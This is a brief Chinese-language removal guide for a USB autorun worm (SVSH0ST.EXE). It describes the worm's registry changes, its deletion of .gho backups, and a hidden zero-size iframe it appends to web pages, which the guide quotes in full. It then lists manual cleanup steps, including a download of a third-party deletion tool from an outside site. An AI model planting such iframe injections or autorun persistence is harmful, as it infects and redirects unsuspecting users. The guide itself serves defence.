(SVSH0ST.EXE)病毒的分析解决

Virus.Win32.AutoRun.cp(SVSH0ST.EXE)病毒的分析解决

作者：佚名

　　添加项禁止修改主页

[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel] "HomePage"=dword:00000001

　　其他行为:

　　修改 .htm 网页文件,在尾部添加(由生成器指定)

<IfrAmE src=http://www.XXXX.com/test.htm width=0 height=0></IfrAmE>

　　删除后辍为 .gho 的文件

　　访问 http://ll80.com/xx/xx.HTM 进行统计

　　注:

　　%system%代表Windows操作系统的系统文件夹路径，并非正式的系统环境变量。

　　对于操作系统版本为Windows XP,装在默认路径的系统,%system%指C:\WINDOWS\system32文件夹

　　清除方法:

　　1. 结束进程(步骤：ctrl+alt+del调用任务管理器)

%System%\SVSH0ST.EXE

　　2.删除文件(如无法直接删除，可到down.591ni.cn下载费尔木马强制删除器工具.zip进行强制删除)

%System%\SVSH0ST.EXE

%System%\dpserio1.dll

%System%\autorun.inf

X:\autorun.inf

X:\lcg.exe

　　3.删除病毒启动项与禁止修改IE主页项(注册表打开方式：开始菜单－运行－输入“regedit”)

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "svchost"="%System%\SVSH0ST.EXE" [HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel] "HomePage"=

　　4. 修改IE主页(直接打开IE修改).

　　5.修复被修改的网页文件

　　备注: 此病毒为生成器所生成,在我们的博客上已经有相应报道

        此生成器目前还有诸多bug

 名种U盘病毒大同小异，请大家在使用U盘时一定要注意。